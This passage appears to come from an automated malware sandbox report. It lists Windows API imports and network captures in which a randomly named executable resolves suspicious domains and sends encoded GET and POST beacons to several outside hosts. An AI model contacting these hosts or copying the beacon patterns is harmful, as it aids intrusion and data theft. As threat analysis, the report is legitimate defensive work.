UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 10, 2025 21:46:41.774080038 CET4995880192.168.2.623.167.152.41
                                                      Jan 10, 2025 21:46:41.779182911 CET804995823.167.152.41192.168.2.6
                                                      Jan 10, 2025 21:46:41.779272079 CET4995880192.168.2.623.167.152.41
                                                      Jan 10, 2025 21:46:41.789952993 CET4995880192.168.2.623.167.152.41
                                                      Jan 10, 2025 21:46:41.794819117 CET804995823.167.152.41192.168.2.6
                                                      Jan 10, 2025 21:46:42.164031982 CET804995823.167.152.41192.168.2.6
                                                      Jan 10, 2025 21:46:42.164153099 CET4995880192.168.2.623.167.152.41
                                                      Jan 10, 2025 21:46:42.165534019 CET4995880192.168.2.623.167.152.41
                                                      Jan 10, 2025 21:46:42.170538902 CET804995823.167.152.41192.168.2.6
                                                      Jan 10, 2025 21:46:57.370512962 CET4998680192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:57.375438929 CET804998613.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:46:57.375647068 CET4998680192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:57.394205093 CET4998680192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:57.399580956 CET804998613.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:46:57.842247963 CET804998613.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:46:57.842268944 CET804998613.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:46:57.842955112 CET4998680192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:58.910659075 CET4998680192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:59.929915905 CET4998880192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:59.934981108 CET804998813.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:46:59.935106993 CET4998880192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:59.960534096 CET4998880192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:46:59.965383053 CET804998813.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:00.392098904 CET804998813.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:00.392198086 CET804998813.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:00.392240047 CET4998880192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:01.473072052 CET4998880192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:02.548597097 CET4998980192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:02.553544998 CET804998913.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:02.553639889 CET4998980192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:02.571429968 CET4998980192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:02.576320887 CET804998913.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:02.576615095 CET804998913.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:04.082590103 CET4998980192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:04.130826950 CET804998913.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:05.101607084 CET4999080192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:05.106587887 CET804999013.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:05.106713057 CET4999080192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:05.119551897 CET4999080192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:05.124393940 CET804999013.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:05.664601088 CET804999013.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:05.664638042 CET804999013.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:05.664813995 CET4999080192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:05.667413950 CET4999080192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:05.672230005 CET804999013.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:05.963620901 CET804998913.248.169.48192.168.2.6
                                                      Jan 10, 2025 21:47:05.963743925 CET4998980192.168.2.613.248.169.48
                                                      Jan 10, 2025 21:47:27.537488937 CET4999180192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:27.542372942 CET8049991154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:27.542491913 CET4999180192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:27.558289051 CET4999180192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:27.563263893 CET8049991154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:28.430403948 CET8049991154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:28.430433035 CET8049991154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:28.430516958 CET4999180192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:29.066916943 CET4999180192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:30.085980892 CET4999380192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:30.090909004 CET8049993154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:30.091116905 CET4999380192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:30.106926918 CET4999380192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:30.111824036 CET8049993154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:31.006692886 CET8049993154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:31.006732941 CET8049993154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:31.006830931 CET4999380192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:31.613784075 CET4999380192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:32.632435083 CET4999480192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:32.637432098 CET8049994154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:32.637578011 CET4999480192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:32.654007912 CET4999480192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:32.658920050 CET8049994154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:32.659065008 CET8049994154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:33.644891024 CET8049994154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:33.644932032 CET8049994154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:33.645008087 CET4999480192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:34.160742998 CET4999480192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:35.182395935 CET4999580192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:35.187382936 CET8049995154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:35.187479019 CET4999580192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:35.203078032 CET4999580192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:35.207959890 CET8049995154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:36.092259884 CET8049995154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:36.092457056 CET8049995154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:36.092565060 CET4999580192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:36.095472097 CET4999580192.168.2.6154.23.178.231
                                                      Jan 10, 2025 21:47:36.100248098 CET8049995154.23.178.231192.168.2.6
                                                      Jan 10, 2025 21:47:41.139283895 CET4999680192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:41.144224882 CET8049996130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:41.144309044 CET4999680192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:41.170913935 CET4999680192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:41.175817013 CET8049996130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:41.772505045 CET8049996130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:41.772582054 CET8049996130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:41.775345087 CET4999680192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:42.679137945 CET4999680192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:43.696619987 CET4999780192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:43.701852083 CET8049997130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:43.701945066 CET4999780192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:43.718034983 CET4999780192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:43.723150015 CET8049997130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:44.325855970 CET8049997130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:44.328685045 CET8049997130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:44.328768969 CET4999780192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:45.223117113 CET4999780192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.243134975 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.248163939 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.248379946 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.263134003 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:46.268027067 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.268137932 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.910240889 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.910454035 CET8049998130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:46.910540104 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:47.770009041 CET4999880192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.788233042 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.793446064 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:48.793520927 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.802963018 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:48.807810068 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:49.476176977 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:49.476269007 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:49.476341009 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:49.480279922 CET4999980192.168.2.6130.185.109.77
                                                      Jan 10, 2025 21:47:49.485394001 CET8049999130.185.109.77192.168.2.6
                                                      Jan 10, 2025 21:47:54.509275913 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:54.514108896 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:54.515217066 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:54.531306982 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:54.536156893 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.120342016 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.123480082 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.123496056 CET8050000108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:55.123537064 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:55.123572111 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:56.039134026 CET5000080192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.054733038 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.059633970 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.059919119 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.076729059 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.081507921 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636166096 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636430025 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636490107 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:57.636563063 CET8050001108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:57.636610985 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:58.593313932 CET5000180192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.601098061 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.605994940 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:59.606066942 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.623163939 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:47:59.628058910 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:47:59.628137112 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.159053087 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.160706997 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.160726070 CET8050002108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:00.163275957 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:01.129396915 CET5000280192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.945161104 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.950201988 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:02.950443029 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.960645914 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:02.965847015 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.513480902 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.513495922 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.513616085 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:03.514204025 CET8050003108.181.189.7192.168.2.6
                                                      Jan 10, 2025 21:48:03.514256954 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:03.515849113 CET5000380192.168.2.6108.181.189.7
                                                      Jan 10, 2025 21:48:03.520605087 CET8050003108.181.189.7192.168.2.6

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 10, 2025 21:46:41.063204050 CET6137853192.168.2.61.1.1.1
                                                      Jan 10, 2025 21:46:41.767545938 CET53613781.1.1.1192.168.2.6
                                                      Jan 10, 2025 21:46:57.212524891 CET5947653192.168.2.61.1.1.1
                                                      Jan 10, 2025 21:46:57.366874933 CET53594761.1.1.1192.168.2.6
                                                      Jan 10, 2025 21:47:10.680228949 CET4946653192.168.2.61.1.1.1
                                                      Jan 10, 2025 21:47:10.691370964 CET53494661.1.1.1192.168.2.6
                                                      Jan 10, 2025 21:47:18.758699894 CET5552153192.168.2.61.1.1.1
                                                      Jan 10, 2025 21:47:18.768562078 CET53555211.1.1.1192.168.2.6
                                                      Jan 10, 2025 21:47:26.836257935 CET5281753192.168.2.61.1.1.1
                                                      Jan 10, 2025 21:47:27.534749031 CET53528171.1.1.1192.168.2.6
                                                      Jan 10, 2025 21:47:41.101629019 CET5770653192.168.2.61.1.1.1
                                                      Jan 10, 2025 21:47:41.136173010 CET53577061.1.1.1192.168.2.6
                                                      Jan 10, 2025 21:47:54.492594004 CET6423653192.168.2.61.1.1.1
                                                      Jan 10, 2025 21:47:54.506529093 CET53642361.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 10, 2025 21:46:41.063204050 CET192.168.2.61.1.1.10xe344Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:46:57.212524891 CET192.168.2.61.1.1.10x21a0Standard query (0)www.bcg.servicesA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:10.680228949 CET192.168.2.61.1.1.10x111Standard query (0)www.egldfi.xyzA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:18.758699894 CET192.168.2.61.1.1.10xf82dStandard query (0)www.betmatchx.onlineA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:26.836257935 CET192.168.2.61.1.1.10x1a20Standard query (0)www.43kdd.topA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:41.101629019 CET192.168.2.61.1.1.10x863dStandard query (0)www.lgdiamonds.infoA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:54.492594004 CET192.168.2.61.1.1.10x700cStandard query (0)www.jalan2.onlineA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 10, 2025 21:46:41.767545938 CET1.1.1.1192.168.2.60xe344No error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 21:46:41.767545938 CET1.1.1.1192.168.2.60xe344No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 21:46:41.767545938 CET1.1.1.1192.168.2.60xe344No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:46:57.366874933 CET1.1.1.1192.168.2.60x21a0No error (0)www.bcg.services13.248.169.48A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:46:57.366874933 CET1.1.1.1192.168.2.60x21a0No error (0)www.bcg.services76.223.54.146A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:10.691370964 CET1.1.1.1192.168.2.60x111Name error (3)www.egldfi.xyznonenoneA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:18.768562078 CET1.1.1.1192.168.2.60xf82dName error (3)www.betmatchx.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:27.534749031 CET1.1.1.1192.168.2.60x1a20No error (0)www.43kdd.top43kdd.topCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 21:47:27.534749031 CET1.1.1.1192.168.2.60x1a20No error (0)43kdd.top154.23.178.231A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:41.136173010 CET1.1.1.1192.168.2.60x863dNo error (0)www.lgdiamonds.info130.185.109.77A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 21:47:54.506529093 CET1.1.1.1192.168.2.60x700cNo error (0)www.jalan2.onlinejalan2.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 21:47:54.506529093 CET1.1.1.1192.168.2.60x700cNo error (0)jalan2.online108.181.189.7A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.75178.club
                                                      • www.bcg.services
                                                      • www.43kdd.top
                                                      • www.lgdiamonds.info
                                                      • www.jalan2.online

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.64995823.167.152.41803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:46:41.789952993 CET481OUTGET /vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.75178.club
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.64998613.248.169.48803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:46:57.394205093 CET739OUTPOST /5onp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 209
                                                      Host: www.bcg.services
                                                      Origin: http://www.bcg.services
                                                      Referer: http://www.bcg.services/5onp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 4f 31 34 4b 78 56 48 47 34 50 34 43 72 36 6f 46 79 43 66 6c 76 71 4a 58 70 6b 37 2b 42 33 75 4a 56 6f 6a 55 56 54 2b 48 35 5a 78
                                                      Data Ascii: grix=VSFgwmtnFo8YbjeIOMu1wncJ4R5I/xXrmyDD8TA+jeWv8hVPh3vHEd+XvQtC8DPLjGrSQbL3TOWXJ49oxRkTdSH/qvbOhszGi7D/bBThykyRllmb7vxaDUrptheOWf6MRX9ztQpPoAi6SzWHagbAzmWoklmS8wy31O14KxVHG4P4Cr6oFyCflvqJXpk7+B3uJVojUVT+H5Zx
                                                      Jan 10, 2025 21:46:57.842247963 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.64998813.248.169.48803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:46:59.960534096 CET763OUTPOST /5onp/ HTTP/1.1
